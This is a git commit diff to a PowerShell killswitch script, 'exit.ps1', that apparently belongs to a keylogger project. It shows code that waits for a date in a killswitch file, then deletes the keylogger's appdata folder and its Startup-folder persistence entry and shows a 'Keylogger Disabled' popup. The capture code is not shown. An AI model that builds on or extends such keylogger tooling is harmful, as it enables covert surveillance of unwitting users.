Update exit.ps1
This commit is contained in:
parent
1ca6e03038
commit
8929c90f2d
1 changed files with 1 additions and 4 deletions
|
@ -1,7 +1,4 @@
|
|||
Add-Type -AssemblyName WindowsBase
|
||||
Add-Type -AssemblyName PresentationCore
|
||||
|
||||
|
||||
Add-Type -AssemblyName PresentationCore,PresentationFramework
|
||||
|
||||
while($true){
|
||||
|
@ -11,7 +8,7 @@ if(((get-date) -gt (Get-content "$env:appdata\-locker\killswitch.txt")) -or ($Rc
|
|||
sleep 10
|
||||
Remove-Item "$env:appdata\-locker" -Recurse -Force;
|
||||
Remove-Item "$env:userprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\-p.cmd"
|
||||
#$done = New-Object -ComObject Wscript.Shell;$done.Popup("Keylogger Disabled",3)
|
||||
$done = New-Object -ComObject Wscript.Shell;$done.Popup("Keylogger Disabled",3)
|
||||
Remove-Item "$env:appdata\-exit.ps1"
|
||||
}
|
||||
else{continue}
|
||||
|
|
Loading…
Add table
Add a link
Reference in a new issue